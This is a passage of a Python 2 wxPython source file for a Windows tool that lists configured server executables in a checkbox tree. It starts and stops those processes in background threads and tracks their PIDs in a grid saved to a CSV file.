self.Bind(CT.EVT_TREE_BEGIN_DRAG, self.OnDrag, id=self.GetId())\n # self.Bind(CT.EVT_TREE_ITEM_COLLAPSED, self.CollapseAll)\n\n # 右键菜单\n def RightClickEvt(self, e):\n pos = e.GetPoint()\n self.PopupMenu(self.RightMenu(e), pos)\n e.Skip()\n\n # 创建右键菜单\n def RightMenu(self, e):\n subMenu = wx.Menu()\n subMenu.Append(wx.ID_OPEN, \"打开目录(&O)\")\n subMenu.Append(wx.ID_ADD, \"加入选项(&A)\")\n subMenu.Append(wx.ID_DELETE, \"移出选项(&D)\")\n subMenu.Bind(wx.EVT_MENU, self.PopupMenuEvt)\n e.Skip()\n return subMenu\n\n # 右键菜单监听事件\n def PopupMenuEvt(self, e):\n item = self.GetSelection()\n itemData = item.GetData()\n eId = e.GetId()\n if eId == wx.ID_OPEN:\n explorer_select_file(itemData)\n elif eId == wx.ID_ADD:\n self.CheckItem(item, True)\n self.AutoCheckChild(item, True)\n else:\n self.CheckItem(item, False)\n self.AutoCheckChild(item, False)\n e.Skip()\n\n # Json文件中的过滤项\n def GetFilter(self, jsonObj={}):\n filterList = []\n for key in jsonObj.keys():\n curFilter = jsonObj[key].get('filter', \"\")\n filterList.extend(curFilter if type(curFilter) is list else [jsonObj[key].get('filter', \"\")])\n filterList = list(set([exe.lower() for exe in filterList if exe]))\n return filterList\n\n # 添加按钮图片列表\n def addImageList(self):\n self.IconList = wx.ImageList(16, 16)\n self.IconList.Add(wx.ArtProvider.GetBitmap(wx.ART_HARDDISK, wx.ART_OTHER, size=(16, 16)))\n self.IconList.Add(wx.ArtProvider.GetBitmap(wx.ART_FOLDER, wx.ART_OTHER, size=(16, 16)))\n self.IconList.Add(wx.ArtProvider.GetBitmap(wx.ART_NORMAL_FILE, wx.ART_OTHER, size=(16, 16)))\n self.IconList.Add(wx.ArtProvider.GetBitmap(wx.ART_EXECUTABLE_FILE, wx.ART_OTHER, size=(16, 16)))\n self.IconList.Add(wx.ArtProvider.GetBitmap(wx.ART_ERROR, wx.ART_OTHER, size=(16, 16)))\n self.AssignImageList(self.IconList)\n\n # 创建树形结构\n def CreateTreeCtrl(self):\n self.rootNode = self.AddRoot(text=u\"计算机\", data=None, ct_type=0)\n for key in self.itemKeys:\n serverDir = 
self.JsonObj[key].get(\"settings\", dict()).get(\"rootdir\", None)\n self.ExeList = [exe.lower() for exe in self.JsonObj[key].keys() if exe.lower() != 'settings']\n self.EexFilter = self.GetFilter(self.JsonObj[key])\n if serverDir and os.path.isdir(serverDir):\n dirSplit = os.path.realpath(serverDir).split(os.sep)\n HardDisk = dirSplit[0]\n HardDiskDir = os.path.normpath(HardDisk + os.sep)\n HardDiskText = os.path.normpath(u\"本地磁盘 (%s)\" % HardDisk)\n HardDiskImage = 0\n HardDiskNode = self.FindItemByPath(self.GetRootItem(), HardDiskDir)\n if not HardDiskNode:\n HardDiskNode = self.AppendItem(self.rootNode, text=HardDiskText, data=HardDiskDir,\n image=HardDiskImage,\n ct_type=0)\n self.SelectItem(HardDiskNode)\n HardDiskNode.Check()\n for subdir in dirSplit:\n curDir = os.path.normpath(os.path.join(self.GetPath(), subdir))\n if not os.path.isdir(curDir):\n break\n subNode = self.FindItemByPath(self.GetRootItem(), curDir)\n if not subNode:\n subImage = 1 if os.path.isdir(curDir) else 3 if (\n os.path.isfile(curDir) and os.path.splitext(subdir)[1].lower() == '.exe') else 2\n subNode = self.AppendItem(self.GetSelection(), text=subdir, data=curDir, image=subImage,\n ct_type=1)\n self.SelectItem(subNode)\n subNode.Check()\n self.AddItems(self.GetSelection(), serverDir)\n\n if self.GetSelection() is not self.GetRootItem():\n self.Expand(self.GetSelection())\n self.root.SetStatusText(self.GetSelection().GetData(), 0)\n else:\n self.root.SetStatusText(u\"路径设置错误\", 0)\n self.CollapseAll(self.GetSelection())\n # self.CheckChilds(self.GetRootItem(), True)\n self.EnableTools()\n\n # 树形结构子项添加\n def AddItems(self, rootNode, rootDir):\n if not os.path.isdir(rootDir):\n return\n rootFileList = sorted(os.listdir(rootDir), key=lambda key: os.path.isdir(os.path.join(rootDir, key)),\n reverse=True)\n for itemText in rootFileList:\n subDir = os.path.normpath(os.path.join(rootDir, itemText))\n # 图标格式,对应imaglist\n (preName, fixName) = os.path.splitext(itemText)\n subImage = 1 if os.path.isdir(subDir) else 3 if (\n os.path.isfile(subDir) and preName.lower() in self.ExeList and fixName.lower() == '.exe') else 2\n if subImage == 2:\n continue\n if subImage == 1:\n if int(win32file.GetFileAttributesW(subDir)) == 22:\n continue\n os.chdir(subDir)\n FindExeList = glob.glob('./*/*/*/*.exe') or glob.glob('./*/*/*.exe') or glob.glob(\n './*/*.exe') or glob.glob('./*.exe')\n FindExeList = [os.path.splitext(os.path.basename(exe))[0].lower() for exe in FindExeList if exe]\n if not set(FindExeList).intersection(set(self.ExeList)):\n continue\n os.chdir(scriptDir)\n try:\n subNode = self.AppendItem(rootNode, text=itemText.encode('utf-8'), data=subDir, image=subImage,\n ct_type=1)\n except:\n continue\n if self.RightPanel.GetNumberRows() > 1:\n row, pid = self.RightPanel.FindRowByValue([os.path.normpath(rootDir), itemText], 2)\n if row != -1:\n subNode.Check()\n self.AutoCheckParent(subNode, True)\n else:\n if preName.lower() not in self.EexFilter and rootNode.IsChecked():\n subNode.Check()\n self.AutoCheckParent(subNode, True)\n if os.path.isdir(subDir):\n self.AddItems(subNode, subDir)\n\n # 获得焦点的路径\n def GetPath(self):\n return self.GetSelection().GetData()\n\n # 获得复选框选择项\n def GetCheckedItems(self, checkList=[], item=None):\n item = item or self.GetRootItem()\n itemData = item.GetData()\n if item.IsChecked():\n if itemData and os.path.splitext(itemData)[1].lower() == '.exe':\n checkList.append(item.GetData())\n # yield item.GetData()\n (child, cookie) = self.GetFirstChild(item)\n while child:\n 
self.GetCheckedItems(checkList, child)\n (child, cookie) = self.GetNextChild(item, cookie)\n return sorted(checkList, key=lambda key: self.JsonExe[os.path.splitext(os.path.basename(key))[0].lower()])\n\n # 根据json配置定义顺序,排序复选框选择项\n def SortCheckedItem(self, checkList=[]):\n for item in self.itemKeys:\n for exe in (sorted(self.JsonObj[item], key=lambda key: self.JsonObj[item][key].get('order', 9999))):\n if exe != 'settings':\n checkList.append(exe)\n return {key.lower(): value for value, key in enumerate(checkList)}\n\n # 展开指定路径\n def ExpandPath(self, path):\n rootItem = self.GetRootItem()\n self.CollapseAll(rootItem)\n item = self.FindItemByPath(rootItem, path)\n if item and item is not self.GetRootItem():\n self.ExpandUpNode(item)\n\n # 展开元素的所有父级元素\n def ExpandUpNode(self, item):\n itemParent = self.GetItemParent(item)\n if itemParent and itemParent is not self.GetRootItem():\n self.Expand(itemParent)\n self.ExpandUpNode(itemParent)\n self.Expand(item)\n self.SelectItem(item, True)\n\n # 收拢元素\n def CollapseAll(self, item=None):\n item = item or self.GetRootItem()\n if (type(item) is wx.lib.agw.customtreectrl.TreeEvent):\n item = item.GetItem()\n if item is not self.GetRootItem():\n item.Collapse()\n (child, cookie) = self.GetFirstChild(item)\n while child:\n child.Collapse()\n self.CollapseAll(child)\n (child, cookie) = self.GetNextChild(item, cookie)\n\n # 通过路径查找元素\n def FindItemByPath(self, parent=None, path=None):\n if not path:\n return False\n (child, cookie) = self.GetFirstChild(parent)\n while child:\n curPath = os.path.normpath(child.GetData()).lower()\n if curPath == os.path.normpath(path).lower():\n return child\n target = self.FindItemByPath(child, path)\n if target:\n return target\n (child, cookie) = self.GetNextChild(parent, cookie)\n return child\n\n # 复选框选择事件监听\n def BindChecked(self, e):\n item = e.GetItem()\n self.SelectItem(item, True)\n self.Expand(item)\n self.root.SetStatusText(item.GetData(), 0)\n self.EnableTools()\n wx.CallAfter(self.SelectGrid, e)\n e.Skip()\n\n # 定位表格\n def SelectGrid(self, e):\n item = e.GetItem()\n itemData = item.GetData()\n findRow, findPid = self.RightPanel.FindRowByValue(list(os.path.split(itemData)), 2)\n if findRow != -1:\n self.RightPanel.SelectRow(int(findRow))\n e.Skip()\n\n # 根据是否存在选择项,设定工具栏按钮状态\n def EnableTools(self):\n toolBar = self.root.GetToolBar()\n hasChecked = True if self.GetCheckedItems([], self.GetSelection()) else False\n\n toolBar.EnableTool(ID_Start, hasChecked)\n toolBar.EnableTool(ID_Pause, False)\n toolBar.EnableTool(ID_Close, hasChecked)\n\n toolBar.Realize()\n\n # 元素拖拽事件\n def OnDrag(self, e):\n item = e.GetItem()\n print(item.GetData())\n e.Skip()\n\n\n# TODO: 进程状态列表\nclass PidGrid(wx.grid.Grid):\n def __init__(self, parent=None, csvFile=\"./ProcessList.csv\"):\n super(PidGrid, self).__init__(parent=parent)\n self.parent = parent\n self.root = self.parent.root\n self.SetRowLabelSize(24)\n self.NowJob = None\n self.NewChange = False\n os.chdir(scriptDir)\n self.csvFile = os.path.normpath(os.path.abspath(csvFile))\n # wx.CallAfter(self.SetRowValueFromCsv)\n wx.CallLater(1000, self.SetRowValueFromCsv)\n\n self.Bind(wx.grid.EVT_GRID_CELL_RIGHT_CLICK, self.RightClickEvt)\n self.root.GetToolBar().Bind(wx.EVT_TOOL, self.RefreshTable, id=wx.ID_REFRESH)\n\n # 右键弹出菜单\n def RightClickEvt(self, e):\n self.SelectRow(e.GetRow())\n pos = e.GetPosition()\n self.PopupMenu(self.RightMenu(e), pos)\n e.Skip()\n\n # 创建右键菜单\n def RightMenu(self, e):\n row = self.GetSelectedRows()[0]\n rValue = list(self.GetRowValue(row))\n enable = 
True if int(rValue[3]) != -1 else False\n subMenu = wx.Menu()\n subMenu.Append(wx.ID_OPEN, \"打开目录(&O)\")\n subMenu.Append(ID_Switch, \"切换至(&F)\").Enable(enable)\n subMenu.Append(ID_Start, \"启动(&S)\").Enable(not enable)\n subMenu.Append(ID_Close, \"关闭(&C)\").Enable(enable)\n subMenu.Append(wx.ID_REMOVE, \"移除(&D)\")\n subMenu.Bind(wx.EVT_MENU, self.PopupMenuEvt)\n e.Skip()\n return subMenu\n\n # 右键菜单监听事件\n def PopupMenuEvt(self, e):\n eId = e.GetId()\n row = self.GetSelectedRows()[0]\n rValue = list(self.GetRowValue(row))\n if not rValue:\n return e.Skip()\n filePath = os.path.join(rValue[0], rValue[1])\n if eId == wx.ID_OPEN:\n explorer_select_file(filePath)\n elif eId == ID_Switch:\n SystemWindow.SetForegroundByPid(int(rValue[3]))\n elif eId == ID_Start:\n self.ReSetJob()\n self.NowJob = GridThreadTask(row=row, rValue=rValue, parent=self, BindId=eId)\n self.NowJob.start()\n elif eId == ID_Close:\n self.ReSetJob()\n pid = rValue[3]\n if pid != -1:\n self.NowJob = GridThreadTask(row=row, rValue=rValue, parent=self, BindId=eId)\n self.NowJob.start()\n else:\n self.ReSetJob()\n pid = rValue[3]\n if pid != -1:\n self.NowJob = GridThreadTask(row=row, rValue=rValue, parent=self, BindId=ID_Close, rmRow=True)\n self.NowJob.start()\n self.DeleteRows(row, 1)\n self.NewChange = True\n self.SaveToCsv()\n return e.Skip()\n e.Skip()\n\n def ReSetJob(self):\n if self.NowJob and self.NowJob.isAlive():\n self.NowJob.stop()\n del self.NowJob\n gc.collect()\n self.NowJob = None\n\n # 通过单元格值查找行号和pid\n def FindRowByValue(self, RowValueList, colnum=3):\n findRow = -1\n findPid = -1\n for row in range(self.GetNumberRows()):\n rValue = list(self.GetRowValue(row))\n if rValue[0:colnum] == RowValueList[0:colnum]:\n findPid = rValue[3]\n findRow = row\n line = 0 if row < 30 else row\n self.Scroll(0, line)\n # self.ScrollLines(31)\n break\n gc.collect()\n return findRow, findPid\n\n # 设置表格指定行的值\n def SetRowValue(self, row, RowValueList, colour=wx.BLACK, select=True):\n self.NewChange = True\n if select:\n self.SelectRow(row)\n self.SetRowSize(row, 18)\n for col in range(self.GetNumberCols()):\n self.SetCellTextColour(row, col, colour)\n cSize = len(str(RowValueList[col])) * 8\n if cSize > self.GetColSize(col):\n self.SetColSize(col, cSize)\n self.SetCellValue(row, col, str(RowValueList[col]))\n\n # 获取表格指定行的值\n def GetRowValue(self, row):\n for col in range(self.GetNumberCols()):\n yield self.GetCellValue(row=row, col=col).encode('utf-8')\n\n # 获取表头\n def GetRowHeader(self):\n for col in range(self.GetNumberCols()):\n yield self.GetColLabelValue(col).encode('utf-8')\n\n # 设置单元格值\n def AddCellValue(self, RowValueList):\n self.NewChange = True\n findRow, findPid = self.FindRowByValue(RowValueList)\n RowValueList[4] = \"正常\" if psutil.pid_exists(int(RowValueList[3])) and int(\n RowValueList[3]) not in [-1, 0] else \"异常\"\n RowValueList[3] = RowValueList[3] if psutil.pid_exists(int(RowValueList[3])) else -1\n colour = wx.BLACK if int(RowValueList[3]) not in [-1, 0] else wx.RED\n\n if int(findRow) != -1:\n self.SetRowValue(findRow, RowValueList, colour)\n else:\n self.InsertRows(self.GetNumberRows(), 1, True)\n if len(RowValueList) > self.GetNumberCols():\n self.InsertCols(self.GetNumberRows(), len(RowValueList) - self.GetNumberCols(), True)\n self.SetRowValue(self.GetNumberRows() - 1, RowValueList, colour)\n\n # csv文件保存\n def SaveToCsv(self):\n if not self.NewChange:\n return\n rows = self.GetNumberRows()\n # cols = self.GetNumberCols()\n csvFP = open(os.path.realpath(self.csvFile), 'w')\n csvObj = csv.writer(csvFP)\n 
csvObj.writerow(list(self.GetRowHeader()))\n for row in range(rows):\n rValue = list(self.GetRowValue(row))\n if psutil.pid_exists(int(rValue[3])):\n csvObj.writerow(rValue)\n else:\n rValue[3] = str(FindProcess(rValue[0], rValue[1], rValue[2]))\n rValue[4] = \"异常\"\n colour = wx.RED if int(rValue[3]) == -1 else wx.BLACK\n self.SetRowValue(row, rValue, colour, False)\n csvObj.writerow(rValue)\n csvFP.close()\n self.NewChange = False\n\n # 表格刷新\n def RefreshTable(self, e):\n rows = self.GetNumberRows()\n if rows > 1:\n for row in range(rows):\n rValue = list(self.GetRowValue(row))\n if psutil.pid_exists(int(rValue[3])) and int(rValue[3]) != 0:\n continue\n else:\n wx.CallAfter(self.ReSetRowValue, row=row, rValue=rValue)\n else:\n self.SetRowValueFromCsv()\n if e:\n e.Skip()\n\n # 重新设置表格值\n def ReSetRowValue(self, row, rValue):\n self.NewChange = True\n pid = FindProcess(rValue[0], rValue[1], rValue[2])\n rValue[3] = str(pid)\n rValue[4] = \"异常\" if int(rValue[3]) == -1 else \"正常\"\n colour = wx.RED if int(rValue[3]) == -1 else wx.BLACK\n self.SetRowValue(row, rValue, colour, False)\n\n # 从csv初始化表格\n def SetRowValueFromCsv(self):\n self.NewChange = True\n try:\n self.CreateGrid(0, 5)\n except Exception as e:\n print(e)\n if not os.path.isfile(self.csvFile):\n for index, data in enumerate(['目录', '进程名', '参数', 'Pid', '状态']):\n self.SetColLabelValue(index, data)\n return\n with open(self.csvFile, 'rb') as csvFile:\n csvFile.seek(0)\n try:\n dialect = csv.Sniffer().sniff(csvFile.read(1024))\n except Exception as e:\n print(e)\n return\n csvFile.seek(0)\n csvreader = list(csv.reader(csvFile, dialect))\n rows = len(csvreader)\n cols = len(csvreader[0])\n for index, data in enumerate(csvreader[0]):\n self.SetColLabelValue(index, data)\n for row in range(1, rows):\n rValue = csvreader[row]\n if not psutil.pid_exists(int(rValue[3])) or int(rValue[3]) == 0:\n rValue[3] = FindProcess(rValue[0], rValue[1], rValue[2])\n self.AddCellValue(rValue)\n\n\n# TODO: 树形结构执行任务\nclass ThreadTask(threading.Thread):\n def __init__(self, **kwargs):\n super(ThreadTask, self).__init__()\n self.__flag = threading.Event()\n self.__flag.set()\n self.__running = threading.Event()\n self.__running.set()\n self.setDaemon(True)\n self.kwargs = kwargs\n\n self.parent = self.kwargs.get('parent', None)\n self.BindId = self.kwargs.get('BindId', None)\n\n self.root = self.parent.root\n self.menuBar = self.root.GetMenuBar()\n self.toolbar = self.root.GetToolBar()\n\n self.treectrl = self.parent.PageOne.LeftPanel\n self.gridctrl = self.parent.PageOne.RightPanel\n self.logctrl = self.parent.PageTwo\n\n def pause(self):\n self.__flag.clear()\n self.root.SetStatusText(\"暂停\", 2)\n self.logctrl.AppendInfo('暂停')\n return gc.collect()\n\n def restart(self):\n self.__flag.set()\n self.root.SetStatusText(\"继续\", 2)\n self.logctrl.AppendInfo('继续')\n return gc.collect()\n\n def isPaused(self):\n return self.__flag.isSet()\n\n def isStoped(self):\n return not self.__running.isSet()\n\n def stop(self):\n # self.treectrl.Enable(True)\n self.__running.clear()\n self.__flag.set()\n wx.CallAfter(self.gridctrl.SaveToCsv)\n if (self.menuBar.FindItemById(ID_REDIS).IsChecked()) and self.BindId == ID_Close:\n self.parent.SaveRedis()\n if (self.menuBar.FindItemById(ID_MONGO).IsChecked()) and self.BindId == ID_Close:\n self.parent.SaveMongo()\n if (self.menuBar.FindItemById(ID_AFTER).IsChecked()):\n self.after()\n self.root.SetStatusText(\"停止\", 2)\n self.logctrl.AppendInfo('停止')\n return gc.collect()\n\n def befor(self):\n if os.path.isfile(PRE_PY_SCRIPT) 
and os.path.splitext(PRE_PY_SCRIPT)[1].lower() == '.py':\n self.root.SetStatusText(PRE_PY_SCRIPT, 0)\n self.root.SetStatusText(\"正在执行外部脚本...\", 1)\n self.logctrl.AppendWarn('正在执行外部脚本,{0}'.format(PRE_PY_SCRIPT))\n os.popen(\"python \" + PRE_PY_SCRIPT)\n self.root.SetStatusText(\"脚本调用结束\", 1)\n self.logctrl.AppendInfo('脚本调用结束')\n\n else:\n self.root.SetStatusText(\"外部准备脚本不存在\", 1)\n self.logctrl.AppendError('外部准备脚本不存在,{0}'.format(PRE_PY_SCRIPT))\n\n def after(self):\n if os.path.isfile(AFTER_PY_SCRIPT) and os.path.splitext(AFTER_PY_SCRIPT)[1].lower() == '.py':\n self.root.SetStatusText(AFTER_PY_SCRIPT, 0)\n self.root.SetStatusText(\"正在执行外部脚本...\", 1)\n self.logctrl.AppendWarn('正在执行外部脚本,{0}'.format(AFTER_PY_SCRIPT))\n os.popen(\"python \" + AFTER_PY_SCRIPT)\n self.root.SetStatusText(\"脚本调用结束\", 1)\n self.logctrl.AppendInfo('脚本调用结束')\n else:\n self.root.SetStatusText(\"外部恢复脚本不存在\", 1)\n self.logctrl.AppendError('外部恢复脚本不存在,{0}'.format(AFTER_PY_SCRIPT))\n\n def run(self):\n # self.treectrl.Enable(False)\n itemList = self.kwargs.get('ProcessList', None)\n if (self.menuBar.FindItemById(ID_PREPARE).IsChecked()):\n self.befor()\n if not itemList:\n wx.CallAfter(self.gridctrl.SaveToCsv)\n return gc.collect()\n if self.BindId == ID_Close:\n itemList.reverse()\n for index, item in enumerate(itemList):\n self.__flag.wait()\n if not self.__running.isSet():\n return gc.collect()\n dirPath = os.path.dirname(item)\n exeName = os.path.basename(item)\n parameters = self.parent.GetParameters(os.path.splitext(exeName)[0])\n if parameters:\n for parameter in parameters:\n if self.BindId == ID_Start:\n self.openJob(exeName, parameter, dirPath)\n else:\n self.killJob(exeName, parameter, dirPath)\n else:\n if self.BindId == ID_Start:\n self.openJob(exeName, \"\", dirPath)\n else:\n self.killJob(exeName, \"\", dirPath)\n self.stop()\n self.toolbar.ToggleBitmap(self.BindId)\n self.root.SetStatusText(\"完成\", 2)\n\n def openJob(self, exe, arg, workdir):\n row, pid = self.gridctrl.FindRowByValue([workdir, exe, arg], 3)\n if row != -1:\n self.gridctrl.SelectRow(row)\n fpid = FindProcess(workdir, exe, arg)\n self.logctrl.AppendWarn(\"准备开启进程'{0} {1}',工作路径为'{2}'\".format(exe, arg, workdir))\n # check whether the process is already running\n if psutil.pid_exists(int(fpid)):\n BoxID = self.root.warnBox(\n \"'{0}'似乎已开启,检测到Pid为'{1}', \\n确认是否跳过!\".format(os.path.join(workdir, exe) + \" \" + arg, fpid))\n self.logctrl.AppendWarn(\n \"'{0}'似乎已开启,检测到Pid为'{1}', \\n确认是否跳过!\".format(os.path.join(workdir, exe) + \" \" + arg, fpid))\n if BoxID == wx.ID_OK:\n self.root.SetStatusText(\"跳过开启进程{0} {1}\".format(exe, arg), 1)\n self.logctrl.AppendWarn(\"跳过开启进程{0} {1}\".format(exe, arg))\n if int(pid) != int(fpid):\n pid = fpid\n RowValueList = [workdir, exe, arg, pid, \"正常\"]\n self.gridctrl.AddCellValue(RowValueList)\n # wx.CallAfter(self.gridctrl.SaveToCsv)\n gc.collect()\n return\n self.logctrl.AppendWarn(\"继续开启进程{0}\".format(exe))\n\n GetChdir(workdir)\n cmdLine = \"start {0} {1}\".format(exe, \" \".join(arg.split(\",\")))\n os.popen(cmdLine)\n # newly spawned pid\n newPid = FindProcess(workdir, exe, arg)\n pid = SystemWindow.StartServer(newPid)\n RowValueList = [workdir, exe, arg, pid, \"正常\"]\n # launch failed\n if not psutil.pid_exists(int(pid)):\n BoxID = self.root.errorBox(\"'{0} {1}'开服失败,请排查原因!\".format(os.path.join(workdir, exe), arg))\n self.logctrl.AppendError(\"'{0} {1}'开服失败,请排查原因!\".format(os.path.join(workdir, exe), arg))\n if BoxID == wx.ID_OK:\n self.root.SetStatusText(\"开启进程{0} {1}失败\".format(exe, arg), 1)\n else:\n self.root.SetStatusText(\"成功开启进程'{0} 
{1}',pid={2}\".format(exe, arg, pid), 1)\n self.logctrl.AppendInfo(\"成功开启进程'{0} {1}',pid={2}\".format(exe, arg, pid))\n\n self.gridctrl.AddCellValue(RowValueList)\n GetChdir(scriptDir)\n # wx.CallAfter(self.gridctrl.SaveToCsv)\n wait_time(TIME_SLEEP)\n return pid\n\n def killJob(self, exe, arg, workdir):\n # 查看表格中是否有相关项\n row, pid = self.gridctrl.FindRowByValue([workdir, exe, arg], 3)\n if row != -1:\n self.gridctrl.SelectRow(row)\n # 查找进程中是否有相关项\n if not psutil.pid_exists(int(pid)):\n pid = int(FindProcess(workdir, exe, arg))\n elif not psutil.Process(int(pid)).name().lower() == exe.lower():\n pid = int(FindProcess(workdir, exe, arg))\n elif not IsSameDir(psutil.Process(int(pid)).cwd(), workdir):\n pid = int(FindProcess(workdir, exe, arg))\n elif not psutil.Process(int(pid)).cmdline()[1:] == arg.strip().split():\n pid = int(FindProcess(workdir, exe, arg))\n else:\n pid = int(pid)\n self.logctrl.AppendInfo(\"准备关闭进程'{0} {1}',工作路径为'{2}',pid={3}\".format(exe, arg, workdir, str(pid)))\n # 如果没有进程,则把信息保存到表格和csv文件,并跳过\n if not psutil.pid_exists(pid) or pid == 0:\n RowValueList = [workdir, exe, arg, -1, \"异常\"]\n if row != -1:\n self.gridctrl.ReSetRowValue(row, RowValueList)\n # else:\n # self.gridctrl.AddCellValue(RowValueList)\n # wx.CallAfter(self.gridctrl.SaveToCsv)\n self.root.SetStatusText(\"进程'{0} {1}'不存在\".format(exe, arg), 1)\n self.logctrl.AppendError(\"进程'{0} {1}'不存在\".format(exe, arg))\n return\n # 根据pid杀进程\n try:\n SystemWindow.CloseWindowByPid(pid)\n self.root.SetStatusText(\"成功关闭进程'{0} {1}',pid={2}\".format(exe, arg, pid), 1)\n self.logctrl.AppendInfo(\"成功关闭进程'{0} {1}',pid={2}\".format(exe, arg, pid))\n pid = -1\n except Exception as e:\n self.root.SetStatusText(\"关闭进程'{0} {1}'操作异常,pid={2}\".format(exe, arg, pid), 1)\n self.logctrl.AppendError(\"关闭进程'{0} {1}'操作异常,pid={2}\\n{3}\".format(exe, arg, pid, e))\n\n # 保存信息\n RowValueList = [workdir, exe, arg, str(pid), \"异常\"]\n self.gridctrl.AddCellValue(RowValueList)\n # wx.CallAfter(self.gridctrl.SaveToCsv)\n wait_time(TIME_SLEEP)\n return pid\n\n\n# TODO: 表格右键菜单执行任务\nclass GridThreadTask(threading.Thread):\n def __init__(self, **kwargs):\n super(GridThreadTask, self).__init__()\n self.__flag = threading.Event()\n self.__flag.set()\n self.__running = threading.Event()\n self.__running.set()\n self.setDaemon(True)\n self.kwargs = kwargs\n\n self.parent = self.kwargs.get('parent', None)\n self.root = self.parent.root\n self.logctrl = self.parent.parent.parent.PageTwo\n\n self.BindId = self.kwargs.get('BindId', None)\n self.row = int(self.kwargs.get('row', None))\n self.rValue = self.kwargs.get('rValue', None)\n self.rmRow = self.kwargs.get('rmRow', False)\n\n def pause(self):\n self.__flag.clear()\n\n def restart(self):\n self.__flag.set()\n\n def isPaused(self):\n return self.__flag.isSet()\n\n def isStoped(self):\n return not self.__running.isSet()\n\n def stop(self):\n self.__running.clear()\n self.__flag.set()\n wx.CallAfter(self.parent.SaveToCsv)\n return gc.collect()\n\n def run(self):\n while self.__running.isSet():\n self.__flag.wait()\n dirPath = self.rValue[0]\n exeName = self.rValue[1]\n arg = self.rValue[2]\n if self.BindId == ID_Start:\n self.openJob(exeName, arg, dirPath)\n else:\n self.killJob(exeName, arg, dirPath)\n self.stop()\n\n def openJob(self, exe, arg, workdir):\n self.parent.SelectRow(self.row)\n self.logctrl.AppendInfo(\"准备开启进程'{0} {1}',工作路径为'{2}'\".format(exe, arg, workdir))\n pid = FindProcess(self.rValue[0], self.rValue[1], self.rValue[2])\n # 查看进程是否已开启\n if psutil.pid_exists(int(pid)):\n BoxID = 
self.parent.root.warnBox(\n \"'{0}'似乎已开启,检测到Pid为'{1}', \\n确认是否跳过!\".format(os.path.join(workdir, exe) + \" \" + arg, pid))\n\n self.logctrl.AppendWarn(\n \"'{0}'似乎已开启,检测到Pid为'{1}', \\n确认是否跳过!\".format(os.path.join(workdir, exe) + \" \" + arg, pid))\n\n if BoxID == wx.ID_OK:\n self.root.SetStatusText(\"跳过开启进程{0} {1}\".format(exe, arg), 1)\n self.logctrl.AppendWarn(\"跳过开启进程{0} {1}\".format(exe, arg))\n self.rValue[3] = pid\n self.parent.ReSetRowValue(self.row, self.rValue)\n # wx.CallAfter(self.parent.SaveToCsv)\n return gc.collect()\n self.logctrl.AppendWarn(\"继续开启进程{0} {1}\".format(exe, arg))\n if type(workdir) is str:\n workdir = workdir.decode('utf-8')\n GetChdir(workdir)\n cmdLine = \"start {0} {1}\".format(exe, \" \".join(arg.split(\",\")))\n os.popen(cmdLine)\n\n # newly spawned pid\n newPid = FindProcess(self.rValue[0], self.rValue[1], self.rValue[2])\n pid = SystemWindow.StartServer(newPid)\n # launch failed\n if not psutil.pid_exists(int(pid)):\n BoxID = self.root.errorBox(\"'{0} {1}'开服失败,请排查原因!\".format(os.path.join(workdir, exe), arg))\n self.logctrl.AppendError(\"'{0} {1}'开服失败,请排查原因!\".format(os.path.join(workdir, exe), arg))\n if BoxID == wx.ID_OK:\n self.root.SetStatusText(\"开启进程{0} {1}失败\".format(exe, arg), 1)\n self.rValue[3] = -1\n self.parent.ReSetRowValue(self.row, self.rValue)\n # wx.CallAfter(self.parent.SaveToCsv)\n return -1\n\n self.root.SetStatusText(\"成功开启进程'{0} {1}',pid={2}\".format(exe, arg, pid), 1)\n self.logctrl.AppendInfo(\"成功开启进程'{0} {1}',pid={2}\".format(exe, arg, pid))\n self.rValue[3] = pid\n self.parent.ReSetRowValue(self.row, self.rValue)\n GetChdir(scriptDir)\n # wx.CallAfter(self.parent.SaveToCsv)\n wait_time(TIME_SLEEP)\n return pid\n\n def killJob(self, exe, arg, workdir):\n self.parent.SelectRow(self.row)\n # look up the matching row in the grid\n pid = self.rValue[3]\n if not psutil.pid_exists(int(pid)):\n pid = int(FindProcess(workdir, exe, arg))\n elif not psutil.Process(int(pid)).name().lower() == exe.lower():\n pid = int(FindProcess(workdir, exe, arg))\n elif not IsSameDir(psutil.Process(int(pid)).cwd(), workdir):\n pid = int(FindProcess(workdir, exe, arg))\n elif not psutil.Process(int(pid)).cmdline()[1:] == arg.strip().split():\n pid = int(FindProcess(workdir, exe, arg))\n else:\n pid = int(pid)\n self.logctrl.AppendInfo(\"准备关闭进程'{0} {1}',工作路径为'{2}',pid={3}\".format(exe, arg, workdir, pid))\n\n # if the process does not exist, save the info to the grid and csv file, then skip\n if not psutil.pid_exists(pid) or pid == 0:\n self.root.SetStatusText(\"进程'{0} {1}'不存在\".format(exe, arg), 1)\n self.logctrl.AppendError(\"进程'{0} {1}'不存在\".format(exe, arg))\n self.rValue[3] = -1\n if not self.rmRow:\n self.parent.ReSetRowValue(self.row, self.rValue)\n # wx.CallAfter(self.parent.SaveToCsv)\n return\n # kill the process by pid\n try:\n # os.kill(pid, 9)\n # rtn = os.popen(\"taskkill /PID:{0} /F /T\".format(pid)).read().decode('gbk')\n SystemWindow.CloseWindowByPid(pid)\n self.root.SetStatusText(\"成功关闭进程'{0} {1}',pid={2}\".format(exe, arg, pid), 1)\n self.logctrl.AppendInfo(\"成功关闭进程'{0} {1}',pid={2}\".format(exe, arg, pid))\n pid = -1\n except Exception as e:\n self.root.SetStatusText(\"关闭进程'{0}'操作异常,pid={1}\".format(exe, pid), 1)\n self.logctrl.AppendError(\"关闭进程'{0}'操作异常,pid={1}\\n{2}\".format(exe, pid, e))\n self.rValue[3] = pid\n # save the result\n if not self.rmRow:\n self.parent.ReSetRowValue(self.row, self.rValue)\n # wx.CallAfter(self.parent.SaveToCsv)\n wait_time(TIME_SLEEP)\n return pid\n\n\n# TODO: minimize-to-tray icon\nclass TaskBarIcon(wx.adv.TaskBarIcon):\n def __init__(self, frame):\n super(TaskBarIcon, self).__init__()\n self.MainFrame = frame\n self.initID()\n 
